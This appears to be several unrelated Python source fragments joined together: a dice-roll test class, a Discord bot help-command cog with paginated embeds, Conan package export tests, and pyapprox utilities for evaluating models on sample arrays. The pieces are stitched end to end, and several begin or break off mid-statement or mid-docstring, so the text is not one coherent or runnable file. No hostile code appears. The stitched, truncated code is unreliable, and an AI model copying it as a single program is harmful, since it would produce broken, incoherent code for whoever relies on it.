class TestRollOutcome:
def test_is_even(self) -> None:
six = RollOutcome(6)
six_even = six.is_even()
assert six_even.value is True
assert six_even.sources == (six,)
def test_is_odd(self) -> None:
six = RollOutcome(6)
six_odd = six.is_odd()
assert six_odd.value is False
assert six_odd.sources == (six,)
def test_euthanize(self) -> None:
six = RollOutcome(6)
rip_six = | |
Be careful
as this method is not the builtin default help_command and will be
removed if the cog is unloaded"""
# Set the title of the embed so custom messages can be added in
self.title = msg
# Good thing Cog, Command, and Group all have .qualified_name
# If no cmd, Bot help page will be sent
msg = await self.command_callback(ctx, command=cmd.qualified_name if cmd else None)
# Remove title, so it doesn't carry over
# Would move ot prepare_help_command, but it is called in command_callback
self.title = None
return msg
def format_doc(self, item: Union[Bot, Cog, Command, Group]) -> Tuple[str, str]:
"""Get and format the help information to be added to embeds
Change this method to changed markdown and formatting"""
# Only added to Embed body, so description is fine
# Fields will be headed by Cogs and filled by Commands
if isinstance(item, Bot):
if item.description:
desc = item.description.replace("[p]", self.prefix)
# Maximum embed body description length
if len(desc) > 2043:
desc = f"{desc[:2043]}..."
# Don't need bot name since it's in the Embed Author
return f"*{desc}*", ""
else:
# Need to have something in the body and v1.2.4 doesn't respect ZWSPs anymore, so repeat bot name
return f"*{item.user.name}*", ""
# Get Cog name and description if it has one
# Both are added to the body
elif isinstance(item, Cog):
if item.description:
# "CogName", "*Description: $command for use*"
return item.qualified_name, f"*{item.description.replace('[p]', self.prefix)}*"
else:
# "CogName", ""
return item.qualified_name, ""
# Groups and Commands are treated the same
elif isinstance(item, Command) or isinstance(item, Group):
# Command.brief can optionally be set at definition
# Use it if it's available, otherwise, use the automatic short_doc using first line from docstr
brief = item.brief if item.brief else item.short_doc
# Command.help is automatically set from full docstr on definition
desc = item.help
# .help will be None if no docstr
if desc:
desc = desc.replace(brief, "").strip("\n").replace("[p]", self.prefix)
# If no .help or if .help same as .short_doc
if not desc:
desc = "No help manual page exists for this command."
# If no .brief or no .short_doc, change to .name after checking .help in case name is mentioned in .help
if not brief:
brief = item.name
return brief, desc
else:
raise TypeError(f"{str(item)}: {item.__class__.__name__} not a subclass of Bot, Cog, Command, or Group.")
def format_cmds_list(self, cmds: List[Union[Command, Group]]) -> str:
"""Formats and paginates the list of a cog's commands
Change this method to change markdown and how commands
listed for Bot, Cog, and Group. Will be paginated later
in """
lines = list()
for cmd in cmds:
# Get and format the one line entry for cmd
brief, _ = self.format_doc(cmd)
lines.append(f"**{self.prefix}{cmd.qualified_name}** {brief}")
return "\n".join(lines)
""" #####################################################################################
Callbacks for help command for arguments Bot [no argument], Cog, Command, and Group
##################################################################################### """
async def send_bot_help(self, mapping: Dict[Union[Cog, None], List[Command]], msg: str = None) -> Message:
"""Prepares help for help command with no argument"""
em = self.em_base()
fields = list()
# Set Embed body description as cog's docstr
em.description, _ = self.format_doc(self.bot)
for cog, cmds in mapping.items():
# Get list of unhidden, commands in cog that user passes checks for
cmds = await self.filter_commands(cmds, sort=True)
# If cog doesn't have any commands user can run, skip it
if not cmds:
continue
# Get header (Category name) for Embed field
category = cog.qualified_name if cog else "No Category"
# Add fields for commands list
formatted_cmds = self.format_cmds_list(cmds)
paginated_fields = self.paginate_field(f"**__{category}__**", formatted_cmds, f"**__{category} (Cont.)__**")
fields.extend(paginated_fields)
return await self.send(em, fields)
async def send_cog_help(self, cog: Cog) -> Message:
"""Prepares help when argument is a Cog"""
em = self.em_base()
fields = list()
# Add Cog name and description if it has one
em.description = "**__{}__**\n{}".format(*self.format_doc(cog))
# Get list of un-hidden, enabled commands that the invoker passes the checks to run
cmds = await self.filter_commands(cog.get_commands(), sort=True)
# Add fields for commands list
if cmds:
str_cmds = self.format_cmds_list(cmds)
paginated_fields = self.paginate_field(f"**__Commands__**", str_cmds, f"**__Commands (Cont.)__**")
fields.extend(paginated_fields)
return await self.send(em, fields)
async def send_group_help(self, group: Group) -> Message:
"""Prepares help when argument is a command Group"""
em = self.em_base()
fields = list()
# Get command usage
if group.usage:
usage = f"`Syntax: {self.prefix}{group.qualified_name} {group.usage}`"
else:
usage = f"`Syntax: {self.get_command_signature(group)}`"
# Add command name and usage to Embed body description
em.description = f"**__{group.qualified_name}__**\n{usage}"
# Add fields for command help manual
brief, doc = self.format_doc(group)
paginated_fields = self.paginate_field(f"__{brief}__", doc, f"(Cont.)")
fields.extend(paginated_fields)
# Get subcommands if any and add them
cmds = await self.filter_commands(group.commands, sort=True)
if cmds:
str_cmds = self.format_cmds_list(cmds)
paginated_fields = self.paginate_field(f"**__Subcommands__**", str_cmds, f"**__Subcommands (Cont.)__**")
fields.extend(paginated_fields)
return await self.send(em, fields)
async def send_command_help(self, cmd: Command) -> Message:
"""Prepares help when argument is a Command"""
em = self.em_base()
fields = list()
# Get command usage
if cmd.usage:
usage = f"`Syntax: {self.prefix}{cmd.qualified_name} {cmd.usage}`"
else:
usage = f"`Syntax: {self.get_command_signature(cmd)}`"
# Add command name and usage to Embed body description
em.description = f"**__{cmd.qualified_name}__**\n{usage}"
# Add fields for command help manual
brief, doc = self.format_doc(cmd)
paginated_fields = self.paginate_field(f"__{brief}__", doc, f"(Cont.)")
fields.extend(paginated_fields)
return await self.send(em, fields)
class Help(Cog):
"""Formats and Provides Help Manual Documentation for Commands
`[p]help` will show all available commands
`[p]help Category` will show all commands belonging to a category
`[p]help command` will show a command's help page and all available subcommands if any"""
def __init__(self, bot: Bot):
self.bot = bot
# Store the currently loaded implementation of HelpCommand
self._original_help_command = bot.help_command
# Replace currently loaded help_command with ours and set this cog as cog so it's not uncategorized
bot.help_command = HelpCommand(dm_help=self.bot.dm_help, field_limit=5, time_limit=120)
bot.help_command.cog = self
# Make send_help_for available as a coroutine method of Bot
bot.send_help_for = bot.help_command.send_help_for
# Dict to store active help sessions with paginated output
self.active_help = dict()
def cog_unload(self):
"""House-cleaning when cog is unloaded
Restore state of help_command to before cog was loaded"""
# Use :param cog property setter to remove Cog from help_command
self.bot.help_command.cog = None
# Restore the help_command that was loaded before cog load
self.bot.help_command = self._original_help_command
async def send_help_for(ctx: Context, cmd: Union[Cog, Command, Group] = None, msg: str = None) -> None:
"""Dummy placeholder to alert and prevent accidental usage after removal"""
raise AttributeError(f"Coroutine `Bot.send_help_for` is not available after Help cog is unloaded.\n"
f"Params: ctx: {ctx}\n"
f" cmd: {cmd}\n"
f" msg: {msg}")
# Replace send_help_for with a dummy coro that raises AttributeError if
# it is attempted to be used after cog is unloaded
self.bot.send_help_for = send_help_for
self.bot.help_command.send_help_for = send_help_for
@Cog.listener("on_reaction_add")
async def on_reaction_add(self, react: Reaction, user: Union[Member, User]):
"""Called when a user adds a reaction to a message
We'll use this to make the help command interactive.
Reactions to change the page if it's long enough to be
paginated."""
# Ignore bot's own reactions
if user.id == self.bot.user.id:
return
# Ignore if the message is not watched (not an active help manual message)
if react.message.id not in self.active_help.keys():
return
# Shorter code and helped with type hinting
msg: Message = react.message
# Add a little delay so we don't run into cache issues
await sleep(0.1)
# We cant remove reactions in Direct Messages
if not isinstance(msg.channel, DMChannel):
# Since it's not the bot and is a watched message, remove reactions we don't care about
if react.emoji not in ["⏮", "◀", "▶", "⏭", "❌"]:
await react.remove(user)
return
# We don't care about reactions that aren't from the user who used [p]help
if user.id != self.active_help[msg.id]["author"].id:
await react.remove(user)
return
# Remove the reaction so key can be pressed again without user removing it first
await react.remove(user)
# Another small delay to avoid cache issues when editing/deleting message after deleting emoji
await sleep(0.1)
# Shorter code
active_help = self.active_help[msg.id]
# Scrub back to first page and set as current index
if react.emoji == "⏮":
# Ignore if already on first page
if active_help["current"] == 0:
return
# Set index to first and edit message to first page
self.active_help[msg.id]["current"] = 0
await msg.edit(embed=active_help["pages"][0])
return
# Move back one page
| |
import os
import stat
import textwrap
import unittest
from parameterized import parameterized
from conans.model.manifest import FileTreeManifest
from conans.model.ref import ConanFileReference
from conans.paths import CONANFILE, CONAN_MANIFEST
from conans.test.utils.cpp_test_files import cpp_hello_conan_files
from conans.test.utils.tools import TestClient, GenConanfile
from conans.test.utils.tools import create_local_git_repo
from conans.util.files import load, save
class ExportSettingsTest(unittest.TestCase):
def test_basic(self):
client = TestClient()
conanfile = """
from conans import ConanFile
class TestConan(ConanFile):
name = "Hello"
version = "1.2"
settings = {"os": ["Linux"]}
"""
files = {CONANFILE: conanfile}
client.save(files)
client.run("export . lasote/stable")
self.assertIn("WARN: Conanfile doesn't have 'license'", client.out)
client.run("install Hello/1.2@lasote/stable -s os=Windows", assert_error=True)
self.assertIn("'Windows' is not a valid 'settings.os' value", client.out)
self.assertIn("Possible values are ['Linux']", client.out)
def export_without_full_reference_test(self):
client = TestClient()
client.save({"conanfile.py": """from conans import ConanFile
class MyPkg(ConanFile):
pass
"""})
client.run("export . lasote/stable", assert_error=True)
self.assertIn("conanfile didn't specify name", client.out)
client.save({"conanfile.py": """from conans import ConanFile
class MyPkg(ConanFile):
name="Lib"
"""})
client.run("export . lasote/stable", assert_error=True)
self.assertIn("conanfile didn't specify version", client.out)
client.save({"conanfile.py": """from conans import ConanFile
class MyPkg(ConanFile):
pass
"""})
client.run("export . lib/1.0@lasote/channel")
self.assertIn("lib/1.0@lasote/channel: A new conanfile.py version was exported",
client.out)
client.save({"conanfile.py": """from conans import ConanFile
class MyPkg(ConanFile):
name="Lib"
version="1.0"
"""})
client.run("export . lasote", assert_error=True)
self.assertIn("Invalid parameter 'lasote', specify the full reference or user/channel",
client.out)
def test_export_read_only(self):
client = TestClient()
conanfile = """
from conans import ConanFile
class TestConan(ConanFile):
name = "Hello"
version = "1.2"
exports = "file1.txt"
exports_sources = "file2.txt"
"""
ref = ConanFileReference.loads("Hello/1.2@lasote/stable")
export_path = client.cache.package_layout(ref).export()
export_src_path = client.cache.package_layout(ref).export_sources()
files = {CONANFILE: conanfile,
"file1.txt": "",
"file2.txt": ""}
client.save(files)
mode1 = os.stat(os.path.join(client.current_folder, "file1.txt")).st_mode
mode2 = os.stat(os.path.join(client.current_folder, "file2.txt")).st_mode
os.chmod(os.path.join(client.current_folder, "file1.txt"), mode1 &~ stat.S_IWRITE)
os.chmod(os.path.join(client.current_folder, "file2.txt"), mode2 &~ stat.S_IWRITE)
client.run("export . lasote/stable")
self.assertEqual(load(os.path.join(export_path, "file1.txt")), "")
self.assertEqual(load(os.path.join(export_src_path, "file2.txt")), "")
with self.assertRaises(IOError):
save(os.path.join(export_path, "file1.txt"), "")
with self.assertRaises(IOError):
save(os.path.join(export_src_path, "file2.txt"), "")
self.assertIn("WARN: Conanfile doesn't have 'license'", client.out)
files = {CONANFILE: conanfile,
"file1.txt": "file1",
"file2.txt": "file2"}
os.chmod(os.path.join(client.current_folder, "file1.txt"), mode1 | stat.S_IWRITE)
os.chmod(os.path.join(client.current_folder, "file2.txt"), mode2 | stat.S_IWRITE)
client.save(files)
client.run("export . lasote/stable")
self.assertEqual(load(os.path.join(export_path, "file1.txt")), "file1")
self.assertEqual(load(os.path.join(export_src_path, "file2.txt")), "file2")
client.run("install Hello/1.2@lasote/stable --build=missing")
self.assertIn("Hello/1.2@lasote/stable: Generating the package", client.out)
files = {CONANFILE: conanfile,
"file1.txt": "",
"file2.txt": ""}
client.save(files)
os.chmod(os.path.join(client.current_folder, "file1.txt"), mode1 &~ stat.S_IWRITE)
os.chmod(os.path.join(client.current_folder, "file2.txt"), mode2 &~ stat.S_IWRITE)
client.run("export . lasote/stable")
self.assertEqual(load(os.path.join(export_path, "file1.txt")), "")
self.assertEqual(load(os.path.join(export_src_path, "file2.txt")), "")
client.run("install Hello/1.2@lasote/stable --build=Hello")
self.assertIn("Hello/1.2@lasote/stable: Generating the package", client.out)
def test_code_parent(self):
""" when referencing the parent, the relative folder "sibling" will be kept
"""
base = """
from conans import ConanFile
class TestConan(ConanFile):
name = "Hello"
version = "1.2"
exports = "../*.txt"
"""
for conanfile in (base, base.replace("../*.txt", "../sibling*")):
client = TestClient()
files = {"recipe/conanfile.py": conanfile,
"sibling/file.txt": "Hello World!"}
client.save(files)
client.current_folder = os.path.join(client.current_folder, "recipe")
client.run("export . lasote/stable")
ref = ConanFileReference("Hello", "1.2", "lasote", "stable")
export_path = client.cache.package_layout(ref).export()
content = load(os.path.join(export_path, "sibling/file.txt"))
self.assertEqual("Hello World!", content)
def test_code_sibling(self):
# if provided a path with slash, it will use as a export base
client = TestClient()
conanfile = """
from conans import ConanFile
class TestConan(ConanFile):
name = "Hello"
version = "1.2"
exports = "../sibling/*.txt"
"""
files = {"recipe/conanfile.py": conanfile,
"sibling/file.txt": "Hello World!"}
client.save(files)
client.current_folder = os.path.join(client.current_folder, "recipe")
client.run("export . lasote/stable")
ref = ConanFileReference("Hello", "1.2", "lasote", "stable")
export_path = client.cache.package_layout(ref).export()
content = load(os.path.join(export_path, "file.txt"))
self.assertEqual("Hello World!", content)
def test_code_several_sibling(self):
# if provided a path with slash, it will use as a export base
client = TestClient()
conanfile = """
from conans import ConanFile
class TestConan(ConanFile):
name = "Hello"
version = "1.2"
exports_sources = "../test/src/*", "../cpp/*", "../include/*"
"""
files = {"recipe/conanfile.py": conanfile,
"test/src/file.txt": "Hello World!",
"cpp/file.cpp": "Hello World!",
"include/file.h": "Hello World!"}
client.save(files)
client.current_folder = os.path.join(client.current_folder, "recipe")
client.run("export . lasote/stable")
ref = ConanFileReference("Hello", "1.2", "lasote", "stable")
export_path = client.cache.package_layout(ref).export_sources()
self.assertEqual(sorted(['file.txt', 'file.cpp', 'file.h']),
sorted(os.listdir(export_path)))
@parameterized.expand([("myconanfile.py", ), ("Conanfile.py", )])
def test_filename(self, filename):
client = TestClient()
conanfile = """
from conans import ConanFile
class TestConan(ConanFile):
name = "Hello"
version = "1.2"
"""
client.save({filename: conanfile})
client.run("export %s lasote/stable" % filename)
self.assertIn("Hello/1.2@lasote/stable: A new conanfile.py version was exported",
client.out)
ref = ConanFileReference("Hello", "1.2", "lasote", "stable")
export_path = client.cache.package_layout(ref).export()
conanfile = load(os.path.join(export_path, "conanfile.py"))
self.assertIn('name = "Hello"', conanfile)
manifest = load(os.path.join(export_path, "conanmanifest.txt"))
self.assertIn('conanfile.py: cac514c81a0af0d87fa379b0bf16fbaa', manifest)
def test_exclude_basic(self):
client = TestClient()
conanfile = """
from conans import ConanFile
class TestConan(ConanFile):
name = "Hello"
version = "1.2"
exports = "*.txt", "!*file1.txt"
exports_sources = "*.cpp", "!*temp.cpp"
"""
client.save({CONANFILE: conanfile,
"file.txt": "",
"file1.txt": "",
"file.cpp": "",
"file_temp.cpp": ""})
client.run("export . lasote/stable")
ref = ConanFileReference("Hello", "1.2", "lasote", "stable")
export_path = client.cache.package_layout(ref).export()
exports_sources_path = client.cache.package_layout(ref).export_sources()
self.assertTrue(os.path.exists(os.path.join(export_path, "file.txt")))
self.assertFalse(os.path.exists(os.path.join(export_path, "file1.txt")))
self.assertTrue(os.path.exists(os.path.join(exports_sources_path, "file.cpp")))
self.assertFalse(os.path.exists(os.path.join(exports_sources_path, "file_temp.cpp")))
def test_exclude_folders(self):
client = TestClient()
conanfile = """
from conans import ConanFile
class TestConan(ConanFile):
name = "Hello"
version = "1.2"
exports = "*.txt", "!*/temp/*"
"""
client.save({CONANFILE: conanfile,
"file.txt": "",
"any/temp/file1.txt": "",
"other/sub/file2.txt": ""})
client.run("export . lasote/stable")
ref = ConanFileReference("Hello", "1.2", "lasote", "stable")
export_path = client.cache.package_layout(ref).export()
self.assertTrue(os.path.exists(os.path.join(export_path, "file.txt")))
self.assertFalse(os.path.exists(os.path.join(export_path, "any/temp/file1.txt")))
self.assertTrue(os.path.exists(os.path.join(export_path, "other/sub/file2.txt")))
class ExportTest(unittest.TestCase):
def setUp(self):
self.client = TestClient()
self.files = cpp_hello_conan_files("Hello0", "0.1")
self.ref = ConanFileReference("Hello0", "0.1", "lasote", "stable")
self.client.save(self.files)
self.client.run("export . lasote/stable")
def test_basic(self):
""" simple registration of a new conans
"""
reg_path = self.client.cache.package_layout(self.ref).export()
manif = FileTreeManifest.load(self.client.cache.package_layout(self.ref).export())
self.assertIn('%s: A new conanfile.py version was exported' % str(self.ref),
self.client.out)
self.assertIn('%s: Folder: %s' % (str(self.ref), reg_path), self.client.out)
self.assertTrue(os.path.exists(reg_path))
for name in list(self.files.keys()):
self.assertTrue(os.path.exists(os.path.join(reg_path, name)))
expected_sums = {'hello.cpp': '4f005274b2fdb25e6113b69774dac184',
'main.cpp': '0479f3c223c9a656a718f3148e044124',
'CMakeLists.txt': '10d907c160c360b28f6991397a5aa9b4',
'conanfile.py': '355949fbf0b4fc32b8f1c5a338dfe1ae',
'executable': '68b329da9893e34099c7d8ad5cb9c940',
'helloHello0.h': '9448df034392fc8781a47dd03ae71bdd'}
self.assertEqual(expected_sums, manif.file_sums)
def test_case_sensitive(self):
self.files = cpp_hello_conan_files("hello0", "0.1")
self.ref = ConanFileReference("hello0", "0.1", "lasote", "stable")
self.client.save(self.files)
self.client.run("export . lasote/stable", assert_error=True)
self.assertIn("ERROR: Cannot export package with same name but different case",
self.client.out)
def test_export_filter(self):
content = """
from conans import ConanFile
class OpenSSLConan(ConanFile):
name = "openssl"
version = "2.0.1"
"""
save(os.path.join(self.client.current_folder, CONANFILE), content)
self.client.run("export . lasote/stable")
ref = ConanFileReference.loads('openssl/2.0.1@lasote/stable')
reg_path = self.client.cache.package_layout(ref).export()
self.assertEqual(sorted(os.listdir(reg_path)),
[CONANFILE, CONAN_MANIFEST])
content = """
from conans import ConanFile
class OpenSSLConan(ConanFile):
name = "openssl"
version = "2.0.1"
exports = ('*.txt', '*.h')
"""
save(os.path.join(self.client.current_folder, CONANFILE), content)
self.client.run("export . lasote/stable")
self.assertEqual(sorted(os.listdir(reg_path)),
['CMakeLists.txt', CONANFILE, CONAN_MANIFEST,
'helloHello0.h'])
# Now exports being a list instead a tuple
content = """
from conans import ConanFile
class OpenSSLConan(ConanFile):
name = "openssl"
version = "2.0.1"
exports = ['*.txt', '*.h']
"""
save(os.path.join(self.client.current_folder, CONANFILE), content)
self.client.run("export . lasote/stable")
self.assertEqual(sorted(os.listdir(reg_path)),
['CMakeLists.txt', CONANFILE, CONAN_MANIFEST, 'helloHello0.h'])
def test_export_the_same_code(self):
file_list = self._create_packages_and_builds()
# Export the same conans
# Do not adjust cpu_count, it is reusing a cache
client2 = TestClient(self.client.cache_folder, cpu_count=False)
files2 = cpp_hello_conan_files("Hello0", "0.1")
client2.save(files2)
client2.run("export . lasote/stable")
reg_path2 = client2.cache.package_layout(self.ref).export()
digest2 = FileTreeManifest.load(client2.cache.package_layout(self.ref).export())
self.assertNotIn('A new Conan version was exported', client2.out)
self.assertNotIn('Cleaning the old builds ...', client2.out)
self.assertNotIn('Cleaning the old packs ...', client2.out)
self.assertNotIn('All the previous packs were cleaned', client2.out)
self.assertIn('%s: A new conanfile.py version was exported' % str(self.ref),
self.client.out)
self.assertIn('%s: Folder: %s' % (str(self.ref), reg_path2), self.client.out)
self.assertTrue(os.path.exists(reg_path2))
for name in list(files2.keys()):
self.assertTrue(os.path.exists(os.path.join(reg_path2, name)))
expected_sums = {'hello.cpp': '4f005274b2fdb25e6113b69774dac184',
'main.cpp': '0479f3c223c9a656a718f3148e044124',
'CMakeLists.txt': '10d907c160c360b28f6991397a5aa9b4',
'conanfile.py': '355949fbf0b4fc32b8f1c5a338dfe1ae',
'executable': '68b329da9893e34099c7d8ad5cb9c940',
'helloHello0.h': '9448df034392fc8781a47dd03ae71bdd'}
self.assertEqual(expected_sums, digest2.file_sums)
for f in file_list:
self.assertTrue(os.path.exists(f))
def test_export_a_new_version(self):
self._create_packages_and_builds()
# Export an update of the same conans
# Do not adjust cpu_count, it is reusing a cache
client2 = TestClient(self.client.cache_folder, cpu_count=False)
files2 = cpp_hello_conan_files("Hello0", "0.1")
files2[CONANFILE] = "# insert comment\n %s" % files2[CONANFILE]
client2.save(files2)
client2.run("export . lasote/stable")
reg_path3 = client2.cache.package_layout(self.ref).export()
digest3 = FileTreeManifest.load(client2.cache.package_layout(self.ref).export())
self.assertIn('%s: A new conanfile.py version was exported' % str(self.ref),
self.client.out)
self.assertIn('%s: Folder: %s' % (str(self.ref), reg_path3), self.client.out)
self.assertTrue(os.path.exists(reg_path3))
for name in list(files2.keys()):
self.assertTrue(os.path.exists(os.path.join(reg_path3, name)))
expected_sums = {'hello.cpp': '4f005274b2fdb25e6113b69774dac184',
'main.cpp': '0479f3c223c9a656a718f3148e044124',
'CMakeLists.txt': '10d907c160c360b28f6991397a5aa9b4',
'conanfile.py': 'ad17cf00b3142728b03ac37782b9acd9',
'executable': '68b329da9893e34099c7d8ad5cb9c940',
'helloHello0.h': '9448df034392fc8781a47dd03ae71bdd'}
self.assertEqual(expected_sums, digest3.file_sums)
# for f in file_list:
# self.assertFalse(os.path.exists(f))
def _create_packages_and_builds(self):
reg_builds = self.client.cache.package_layout(self.ref).builds()
reg_packs = self.client.cache.package_layout(self.ref).packages()
folders = [os.path.join(reg_builds, '342525g4f52f35f'),
os.path.join(reg_builds, 'ew9o8asdf908asdf80'),
os.path.join(reg_packs, '342525g4f52f35f'),
os.path.join(reg_packs, 'ew9o8asdf908asdf80')]
file_list = []
for f in folders:
for name, content in {'file1.h': 'asddfasdf', 'file1.dll': 'asddfasdf'}.items():
file_path = os.path.join(f, name)
save(file_path, content)
file_list.append(file_path)
return file_list
class ExportMetadataTest(unittest.TestCase):
conanfile = textwrap.dedent("""
from conans import ConanFile
class Lib(ConanFile):
revision_mode = "{revision_mode}"
""")
summary_hash = "bfe8b4a6a2a74966c0c4e0b34705004a"
def test_revision_mode_hash(self):
t = TestClient()
t.save({'conanfile.py': self.conanfile.format(revision_mode="hash")})
ref = ConanFileReference.loads("name/version@user/channel")
t.run("export . {}".format(ref))
meta = t.cache.package_layout(ref, short_paths=False).load_metadata()
self.assertEqual(meta.recipe.revision, self.summary_hash)
def test_revision_mode_scm(self):
path, rev = create_local_git_repo(
files={'conanfile.py': self.conanfile.format(revision_mode="scm")})
t = TestClient(current_folder=path)
ref = ConanFileReference.loads("name/version@user/channel")
t.run("export . {}".format(ref))
meta = t.cache.package_layout(ref, short_paths=False).load_metadata()
self.assertEqual(meta.recipe.revision, rev)
def test_revision_mode_invalid(self):
conanfile = self.conanfile.format(revision_mode="auto")
t = TestClient()
t.save({'conanfile.py': conanfile})
ref = ConanFileReference.loads("name/version@user/channel")
t.run("export . {}".format(ref), assert_error=True)
self.assertIn("ERROR: Revision mode should be one of 'hash' (default) or 'scm'", t.out)
def test_export_no_params(self):
client = TestClient()
client.save({"conanfile.py": GenConanfile().with_name("lib").with_version("1.0")})
client.run('export .')
client.cache.package_layout(ConanFileReference.loads("lib/1.0@")).export()
self.assertIn("lib/1.0: A new conanfile.py version was exported", client.out)
# Do it twice
client.run('export . ')
self.assertIn("lib/1.0: The stored package has not changed", client.out)
def export_with_name_and_version_test(self):
client = TestClient()
client.save({"conanfile.py": GenConanfile()})
client.run('export . lib/1.0@')
self.assertIn("lib/1.0: A new conanfile.py version was exported", | |
<reponame>ConnectedSystems/pyapprox
import time
import numpy as np
import subprocess
import os
import glob
from functools import partial
from multiprocessing import Pool
from pyapprox.utilities import get_all_sample_combinations
from pyapprox.utilities import hash_array
def get_num_args(function):
"""
Return the number of arguments of a function.
If function is a member function of a class the self argument is not
counted.
Parameters
----------
function : callable
The Python callable to be interrogated
Return
------
num_args : integer
The number of arguments to the function including
args, varargs, keywords
"""
import inspect
args = inspect.getfullargspec(function)
num_args = 0
if args[0] is not None:
num_args += len(args[0])
if 'self' in args[0]:
num_args -= 1
if args[1] is not None:
num_args += len(args[1])
if args[2] is not None:
num_args += len(args[2])
# do not count defaults of keywords conatined in args[3]
# if args[3] is not None:
# num_args += len(args[3])
return num_args
def evaluate_1darray_function_on_2d_array(function, samples, opts=None):
"""
Evaluate a function at a set of samples using a function that only takes
one sample at a time
Parameters
----------
function : callable
A function with signature
``function(sample) -> np.ndarray```
where sample is a 1d np.ndarray of shape (num_vars) and the output is
a np.ndarray of values of shape (num_qoi). The output can also be a
scalar
samples : np.ndarray (num_vars, num_samples)
The samples at which to evaluate the model
opts : dictionary
A set of options that are needed to evaluate the model
Returns
-------
values : np.ndarray (num_samples, num_qoi)
The value of each requested QoI of the model for each sample
"""
num_args = get_num_args(function)
assert samples.ndim == 2
num_samples = samples.shape[1]
if num_args == 2:
values_0 = function(samples[:, 0], opts)
else:
values_0 = function(samples[:, 0])
values_0 = np.atleast_1d(values_0)
assert values_0.ndim == 1
num_qoi = values_0.shape[0]
values = np.empty((num_samples, num_qoi), float)
values[0, :] = values_0
for i in range(1, num_samples):
if num_args == 2:
values[i, :] = function(samples[:, i], opts)
else:
values[i, :] = function(samples[:, i])
return values
class PyFunction(object):
def __init__(self, function):
self.function = function
def __call__(self, samples, opts=dict()):
return evaluate_1darray_function_on_2d_array(self.function, samples, opts)
def run_shell_command(shell_command, opts={}):
"""
Execute a shell command.
Parameters
----------
shell_command : string
The command that you want executed
output_verbosity : integer (default=0)
0 - supress all model output
1 - write output to file
2 - write output to stdout
filename : string (default=None)
The filename to which the output of the shell command is written.
A file is only written if output_verbosity=1.
If output_verbosity=1 and filename is None then
filename = shell_command.out
env : os.environ (default=None)
Mapping that defines the environment variables for the new process;
these are used instead of inheriting the current process environment,
which is the default behavior.
"""
output_verbosity = opts.get('verbosity', 1)
env = opts.get('env', None)
filename = opts.get('filename', None)
if output_verbosity == 0:
subprocess.check_output(shell_command, shell=True, env=env)
elif output_verbosity == 1:
if filename is None:
filename = 'shell_command.out'
with open(filename, 'w') as f:
subprocess.call(shell_command, shell=True, stdout=f,
stderr=f, env=env)
else:
subprocess.call(shell_command, shell=True, env=env)
class DataFunctionModel(object):
def hash_sample(self, sample):
# if samples have undergone a transformation thier value
# may not be exactly the same so make hash on samples
# with fixed precision
# sample = np.round(sample, self.digits)
# I = np.where(np.abs(sample)<self.tol)[0]
# sample[I] = 0.
key = hash_array(sample) # ,decimals=self.digits)
return key
def __init__(self, function, data=None, data_basename=None,
save_frequency=None, use_hash=True, digits=16):
self.function = function
self.data = dict()
self.samples = np.zeros((0, 0))
self.values = None
self.num_evaluations_ran = 0
self.num_evaluations = 0
self.digits = digits
self.tol = 10**(-self.digits)
self.use_hash = use_hash
self.data_basename = data_basename
self.save_frequency = save_frequency
if self.data_basename is not None:
assert save_frequency is not None
if self.save_frequency and self.data_basename is None:
msg = 'Warning save_frequency not being used because data_basename'
msg += ' is None'
print(msg)
if data_basename is not None:
file_data = combine_saved_model_data(data_basename)
if file_data[0] is not None:
self.add_new_data(file_data)
if data is not None:
self.samples, self.values = data
assert self.samples.shape[1] == self.values.shape[0]
self.add_new_data(data)
def add_new_data(self, data):
samples, values = data
for ii in range(samples.shape[1]):
if self.use_hash:
key = self.hash_sample(samples[:, ii])
if key in self.data:
if not np.allclose(self.values[self.data[key]], values[ii]):
msg = 'Duplicate samples found but values do not match'
raise Exception(msg)
found = True
else:
self.data[key] = ii
found = False
else:
found = False
for jj in range(self.samples.shape[1]):
if np.allclose(self.samples[:, jj], samples[:, ii],
atol=self.tol):
found = True
break
if not found:
if self.samples.shape[1] > 0:
self.samples = np.hstack(
[self.samples, samples[:, ii:ii+1]])
self.values = np.vstack([self.values, values[ii:ii+1, :]])
else:
self.samples = samples[:, ii:ii+1]
self.values = values[ii:ii+1, :]
# set counter so that next file takes into account all previously
# ran samples
self.num_evaluations_ran = self.samples.shape[1]
def _batch_call(self, samples):
assert self.save_frequency > 0
num_batch_samples = self.save_frequency
lb = 0
vals = None
while lb < samples.shape[1]:
ub = min(lb+num_batch_samples, samples.shape[1])
num_evaluations_ran = self.num_evaluations_ran
batch_vals, new_sample_indices = self._call(samples[:, lb:ub])
data_filename = self.data_basename+'-%d-%d.npz' % (
num_evaluations_ran,
num_evaluations_ran+len(new_sample_indices)-1)
np.savez(data_filename, vals=batch_vals[new_sample_indices],
samples=samples[:, lb:ub][:, new_sample_indices])
if vals is None:
vals = batch_vals
else:
vals = np.vstack((vals, batch_vals))
lb = ub
return vals
def _call(self, samples):
evaluated_sample_indices = []
new_sample_indices = []
for ii in range(samples.shape[1]):
if self.use_hash:
key = self.hash_sample(samples[:, ii])
if key in self.data:
evaluated_sample_indices.append([ii, self.data[key]])
else:
new_sample_indices.append(ii)
else:
found = False
for jj in range(self.samples.shape[1]):
if np.allclose(self.samples[:, jj], samples[:, ii],
atol=self.tol):
found = True
break
if found:
evaluated_sample_indices.append([ii, jj])
else:
new_sample_indices.append(ii)
evaluated_sample_indices = np.asarray(evaluated_sample_indices)
if len(new_sample_indices) > 0:
new_samples = samples[:, new_sample_indices]
new_values = self.function(new_samples)
num_qoi = new_values.shape[1]
else:
num_qoi = self.values.shape[1]
values = np.empty((samples.shape[1], num_qoi), dtype=float)
if len(new_sample_indices) > 0:
values[new_sample_indices, :] = new_values
if len(new_sample_indices) < samples.shape[1]:
values[evaluated_sample_indices[:, 0]] = \
self.values[evaluated_sample_indices[:, 1], :]
if len(new_sample_indices) > 0:
if self.samples.shape[1] == 0:
jj = 0
self.samples = samples
self.values = values
else:
jj = self.samples.shape[0]
self.samples = np.hstack(
(self.samples, samples[:, new_sample_indices]))
self.values = np.vstack((self.values, new_values))
for ii in range(len(new_sample_indices)):
key = hash_array(samples[:, new_sample_indices[ii]])
self.data[key] = jj+ii
self.num_evaluations_ran += len(new_sample_indices)
# increment the number of samples pass to __call__ since object created
# includes samples drawn from arxiv and samples used to evaluate
# self.function
self.num_evaluations += samples.shape[1]
return values, new_sample_indices
def __call__(self, samples):
if self.save_frequency is not None and self.save_frequency > 0:
values = self._batch_call(samples)
else:
values = self._call(samples)[0]
return values
def run_model_samples_in_parallel(model, max_eval_concurrency, samples,
pool=None, assert_omp=True):
"""
